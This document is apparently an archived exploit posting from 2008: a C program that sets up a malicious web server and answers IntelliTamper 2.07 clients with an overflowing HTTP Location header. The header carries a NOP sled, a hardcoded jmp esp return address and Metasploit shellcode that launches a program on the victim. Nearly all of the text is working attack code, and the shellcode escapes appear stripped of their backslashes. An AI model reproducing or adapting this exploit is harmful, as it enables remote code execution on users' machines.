intellitamper207-header.txt
Posted on 13 August 2008
/** ** ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit. ** ** Based on exploit by Koshi (written in Perl). This one should be more ** stable. Just for fun and to learn more about win32 exploitation. ** ** by Wojciech Pawlikowski (wojtekp@gmail.com) **/ #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netdb.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUFSIZE 1550 #define NOP 0x90 #define RETADDR 0x7c941EED // jmp esp ntdll.dll /* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */ unsigned char shellcode[] = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x49x48x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42" "x58x30x42x31x50x41x42x6bx41x41x52x41x32x41x41x32" "x42x41x30x42x41x58x50x38x41x42x75x6dx39x59x6cx69" "x78x41x54x75x50x77x70x45x50x6cx4bx73x75x55x6cx4e" "x6bx61x6cx33x35x54x38x55x51x7ax4fx4cx4bx70x4fx45" "x48x4cx4bx33x6fx67x50x45x51x4ax4bx43x79x6cx4bx34" "x74x4cx4bx47x71x6ax4ex64x71x6fx30x5ax39x6ex4cx4e" "x64x4fx30x30x74x45x57x79x51x6bx7ax74x4dx37x71x5a" "x62x4ax4bx5ax54x55x6bx31x44x71x34x55x54x71x65x4b" "x55x6cx4bx73x6fx61x34x45x51x78x6bx65x36x6cx4bx36" "x6cx50x4bx4ex6bx71x4fx57x6cx35x51x38x6bx4cx4bx77" "x6cx6ex6bx77x71x6ax4bx4cx49x71x4cx37x54x34x44x7a" "x63x54x71x39x50x61x74x6cx4bx43x70x46x50x4bx35x49" "x50x72x58x46x6cx6cx4bx47x30x36x6cx6cx4bx70x70x37" "x6cx4ex4dx4cx4bx65x38x46x68x7ax4bx64x49x4ex6bx4f" "x70x6ex50x77x70x77x70x45x50x6cx4bx70x68x37x4cx63" "x6fx64x71x49x66x73x50x31x46x6ex69x59x68x4bx33x69" "x50x51x6bx30x50x32x48x5ax4fx5ax6ex69x70x45x30x33" "x58x4cx58x6bx4ex4cx4ax76x6ex66x37x6bx4fx7ax47x30" "x6dx53x43x62x50x53x51x73x59x32x4ex33x44x45x50x42"; int main(void) { struct sockaddr_in serv_sin, cli_sin; int i, sockfd, cli_sock, sock_opt = 1, sin_len; char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE + 100] = { 0 }; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sockfd < 0) { perror("socket()"); exit(-1); } serv_sin.sin_family = AF_INET; serv_sin.sin_port = htons(80); serv_sin.sin_addr.s_addr = INADDR_ANY; if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0) { perror("setsockopt()"); close(sockfd); exit(-1); } if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0) { perror("bind()"); close(sockfd); exit(-1); } listen(sockfd, 1); sin_len = sizeof(struct sockaddr); printf("[*] Waiting for a connection... "); while (1) { cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len); if (cli_sock < 0) { perror("accept()"); exit(-1); } printf("[+] Connection from %s:%d ", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port)); read(cli_sock, buf, sizeof(buf) - 1); overflow = (char *)malloc(BUFSIZE + 1); for (i = 0; i <= 1540; i += 4) *(long *)&overflow[i] = RETADDR; for (i = 0; i < 1536; i++) overflow[i] = NOP; memcpy(overflow + 550, shellcode, strlen(shellcode)); memcpy(overflow + i + 4, "xe9x14xfcxffxff", 5); // jmp -1000 - jump to our buffer i = sprintf(req, "200 HTTP/1.1 Date: 2008-07-24 20:14:31 Location: "); memcpy(req + i, overflow, strlen(overflow)); memcpy(req + i + strlen(overflow), " ", 4); write(cli_sock, req, strlen(req)); printf("[+] Exploit sent! "); close(cli_sock); } close(sockfd); }
